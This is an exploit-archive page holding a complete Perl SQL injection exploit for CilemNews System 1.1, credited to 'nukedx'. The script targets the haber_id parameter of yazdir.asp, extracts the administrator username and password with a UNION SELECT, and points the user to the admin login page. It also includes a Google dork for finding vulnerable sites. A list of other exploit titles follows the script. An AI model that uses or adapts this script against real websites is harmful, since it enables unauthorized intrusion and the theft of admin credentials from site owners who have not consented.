exploits , vulnerabilities , articles , CilemNews System <= 1.1 (yazdir.asp haber

2006-03-07

CilemNews System <= 1.1 (yazdir.asp haber_id) SQL Injection Exploit

Rated as : High Risk

#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: cilem.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=10
#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages...
use IO::Socket;
if(@ARGV < 2){
print "
+***********************************************************************+
+Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject
xpl+
+                   Usage: cilem.pl <victim> <directory>      
         +
+                       Example: cilem.pl sux.com /                     +
+                 googledork [ inurl:yazdir.asp?haber_id= ]             +
+                 Method found & Exploit scripted by nukedx             +
+***********************************************************************+
";
exit();
}
#Local variables
$cilemserver = $ARGV[0];
$cilemserver =~ s/(http:\/\/)//eg;
$cilemhost = "http://".$cilemserver;
$port = "80";
$cilemdir = $ARGV[1];
$cilemtar = "yazdir.asp?haber_id=";
$cilemfinal = "admin/giris.asp";
$cilemxp =
"1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin";
$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp;
#Writing data to socket
print
"+**********************************************************************+\n";
print "+ Trying to connect: $cilemserver\n";
$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr
=> "$cilemserver", PeerPort => "$port") || die
"\n+ Connection failed...\n";
print $cilem "GET $cilemreq\n";
print $cilem "Host: $cilemserver\n";
print $cilem "Accept: */*\n";
print $cilem "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$cilem>) {
if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){

print "+ Exploit succeed! Getting admin's information.\n";
print "+ ---------------- +\n";
print "+ USERNAME: $1\n";
}
if ($answer =~ /(.*?)<\/font><\/td>/) { 
print "+ PASSWORD: $1\n";
print "+ ---------------- +\n";
print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with
this information. \n";
print
"+**********************************************************************+\n";
exit(); 
}
if ($answer =~ /Internal Server Error/) {
print "+ This version of CilemNews is vulnerable too but default
query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null
datas..\n";
print
"+**********************************************************************+\n";
exit(); 
}
if ($answer =~ /number of columns/) { 
print "+ This version of CilemNews is vulnerable too but default
query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null
datas..\n";
print
"+**********************************************************************+\n";
exit(); 
}
}
print "+ Exploit failed :(\n";
print
"+**********************************************************************+\n";
securitydot.net - 2006-03-07

Exploits - newest 10 RSS | More

2007-06-15 56694 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33810 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41925 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29020 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19509 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16491 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19156 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16353 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33283 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17016 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit

exploits , vulnerabilities , articles , CilemNews System <= 1.1 (yazdir.asp haber_id) SQL Injection Exploit